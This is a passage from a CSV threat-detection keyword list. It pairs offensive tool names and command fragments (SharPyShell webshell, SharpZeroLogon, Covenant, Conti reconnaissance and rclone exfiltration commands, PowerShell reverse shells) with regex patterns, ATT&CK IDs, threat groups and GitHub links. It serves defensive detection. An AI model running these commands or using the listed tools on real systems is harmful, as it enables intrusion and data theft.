"*SharpWMI.exe*",".{0,1000}SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59257"
"*SharpWMI.Program*",".{0,1000}SharpWMI\.Program.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59258"
"*SharpWMI.Program*",".{0,1000}SharpWMI\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59259"
"*SharpWmiManager*",".{0,1000}SharpWmiManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59260"
"*sharpwmi-N*.exe*",".{0,1000}sharpwmi\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59261"
"*SharpWSManWinRM.exe*",".{0,1000}SharpWSManWinRM\.exe.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","59262"
"*sharpwsus locate*",".{0,1000}sharpwsus\slocate.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","59263"
"*SharpWSUS*",".{0,1000}SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","59264"
"*SharpWSUS.*",".{0,1000}SharpWSUS\..{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","59265"
"*SharPyShell Helper Commands:*",".{0,1000}SharPyShell\sHelper\sCommands\:.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59266"
"*SharPyShell*",".{0,1000}SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59267"
"*sharpyshell.aspx*",".{0,1000}sharpyshell\.aspx.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59268"
"*SharPyShell.py*",".{0,1000}SharPyShell\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59269"
"*SharPyShell_Test.ps1*",".{0,1000}SharPyShell_Test\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59270"
"*SharPyShellPrompt.py*",".{0,1000}SharPyShellPrompt\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59271"
"*SharpZeroLogon*",".{0,1000}SharpZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","59272"
"*SharpZeroLogon.exe*",".{0,1000}SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59273"
"*SharpZeroLogon.exe*",".{0,1000}SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","1","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","59274"
"*SharpZippo.exe*",".{0,1000}SharpZippo\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z","59275"
"*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59276"
"*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","1","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59277"
"*shehzade/peeping-tom*",".{0,1000}shehzade\/peeping\-tom.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","59278"
"*shell 'cmd.exe /c*",".{0,1000}shell\s\'cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59279"
"*shell net group *Domain Computers* /domain*",".{0,1000}shell\snet\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59280"
"*shell net localgroup administrators*",".{0,1000}shell\snet\slocalgroup\sadministrators.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59281"
"*shell nltest /dclist*",".{0,1000}shell\snltest\s\/dclist.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59282"
"*shell rclone.exe copy *",".{0,1000}shell\srclone\.exe\scopy\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59283"
"*shell should now be running as nt authority\\system!*",".{0,1000}shell\sshould\snow\sbe\srunning\sas\snt\sauthority\\\\system!.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","59284"
"*shell whoami /user*",".{0,1000}shell\swhoami\s\/user.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","59285"
"*shell whoami*",".{0,1000}shell\swhoami.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59286"
"*shell.exe -s payload.txt*",".{0,1000}shell\.exe\s\-s\spayload\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","59287"
"*shell_shocked*.js*",".{0,1000}shell_shocked.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","59288"
"*shell_shocked*.rb*",".{0,1000}shell_shocked.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","59289"
"*shell_smbadmin -Targets *",".{0,1000}shell_smbadmin\s\-Targets\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59290"
"*shell_startup_files_modification.py*",".{0,1000}shell_startup_files_modification\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","59291"
"*shell_tknadmin -Domain * -DomainController *",".{0,1000}shell_tknadmin\s\-Domain\s.{0,1000}\s\-DomainController\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59292"
"*shell_tknadmin -Targets *",".{0,1000}shell_tknadmin\s\-Targets\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59293"
"*shell_wmiadmin -Domain * -DomainController*",".{0,1000}shell_wmiadmin\s\-Domain\s.{0,1000}\s\-DomainController.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59294"
"*Shell3er.ps1*",".{0,1000}Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","59295"
"*shellc *.bin *",".{0,1000}shellc\s.{0,1000}\.bin\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","59296"
"*shellc *.shellc *",".{0,1000}shellc\s.{0,1000}\.shellc\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","59297"
"*ShellCmd cmd.exe *",".{0,1000}ShellCmd\scmd\.exe\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59298"
"*ShellCmd copy *",".{0,1000}ShellCmd\scopy\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59299"
"*ShellCmd net *",".{0,1000}ShellCmd\snet\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59300"
"*ShellCmd sc qc *",".{0,1000}ShellCmd\ssc\sqc\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59301"
"*Shellcode & key Decrypted after stomping*",".{0,1000}Shellcode\s\&\skey\sDecrypted\safter\sstomping.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","59302"
"*SHELLCODE GENERATOR*",".{0,1000}SHELLCODE\sGENERATOR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59303"
